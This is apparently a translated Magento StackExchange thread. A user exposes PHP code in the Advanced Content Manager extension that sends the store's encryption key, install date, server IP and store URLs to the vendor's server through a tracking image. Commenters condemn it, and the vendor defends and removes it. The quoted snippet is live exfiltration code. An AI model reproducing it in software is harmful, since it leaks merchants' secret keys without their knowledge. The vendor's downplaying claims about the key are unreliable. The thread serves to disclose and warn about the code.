Есть ли веская причина для удаленного доступа к глобальному / crypt / key?

19

Простите мое невежество, но ключ шифрования используется для расшифровки данных Magento, верно? Есть ли у модуля веская причина для доступа к этому? Я наткнулся на этот код после установки Advanced Content Manager ...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />

magento-1.9 TylersSN
источник
3
ЭТО. ЯВЛЯЕТСЯ. КАКОЙ УЖАС. Нет причин для утечки вашего ключа шифрования.
Фабиан Блехшмидт
1
Это плохо, очень плохо.
Анна Фёлькл,
1
Хорошо поймал! Это очень плохо ...
Сандер Мангель
1
Спасибо @Sander за сообщение. Это было удалено из Connect.
отметки
1
@ отметки рад слышать это. Это крайне разочаровывает по очевидным причинам, а также потому, что приложение было чрезвычайно впечатляющим, а разработчик был чрезвычайно полезным и быстрым в прошлом.
TylersSN

Ответы:

11

Да ... есть веская причина.
Они хотят знать это и регистрировать это, на всякий случай. :)

Вы должны удалить расширение (скорее всего, вы уже сделали). Вы никогда не должны использовать расширения, которые «звонят домой», независимо от того, какие данные они отправляют домой.

Возможно, вы захотите перечислить здесь расширение, чтобы другие могли его увидеть: Забавный / Бесполезный / Ужасный код от Magento Extensions

Мариус
источник
1
"звонить домой", к сожалению, делается многими модулями. Amasty и Aheadworks делают это также: \
Сандер Мангель
4
Этот gist.github.com/miguelbalparda/b57a47a010a5995bc44d можно использовать для проверки наличия глобального / crypt / key из CLI во всех папках excelt app / code / core.
mbalparda
Так что они не только могут расшифровывать пароли cc-данных (хорошо, что я их не сохраняю) и т. Д. Но я заплатил 300 долларов за то, чтобы они имели такую ​​возможность. Это то, что должно быть опубликовано в Funny.
TylersSN
1
@iUseMagentoNow. Это смешно "ооо", а не смешно "ха-ха". Вы должны попросить ваши деньги обратно.
Мариус
8

Мы получили запрос в поддержку этой функции сегодня. Мы уже решили это и удалили этот кусок кода. Новая версия доступна для всех наших клиентов в их области (бесплатно, так как мы предлагаем неограниченное обновление).

Я знаю, что мы должны это оправдать, поэтому давайте сделаем это:

  • Целью этого трекера было ТОЛЬКО следить за несанкционированным использованием нашего расширения.
  • Трекер отображался только в административной области (никто из ваших клиентов или кого-либо еще, кроме вас и нас, не смог его увидеть).
  • Мы удалили это и в нашей БД.
  • Ключ только для шифрования вашего пароля администратора. Поскольку мы работаем со всеми вами по запросам поддержки, вы, возможно, уже отправили нам свои учетные данные по электронной почте для поддержки. Если бы мы хотели получить ваш пароль, мы бы отправили его напрямую ... Это не было целью.
  • Даже с ключом ваш пароль все еще зашифрован. И администратор magento блокирует пользователя после некоторых попыток.

Мы признаем, что это ошибка, и в этом сила сообщества и системы с открытым исходным кодом: мы можем исправить и улучшить намного быстрее. Спасибо всем за то, что предупредили нас, сейчас мы приложим больше усилий для устранения уязвимости.

Расширенный контент-менеджер
источник
3
+1 за усилия, чтобы ответить здесь публично на Magento SE!
7очм
2
Несанкционированное использование расширения ?! Вы можете просто использовать домен для этого.
mbalparda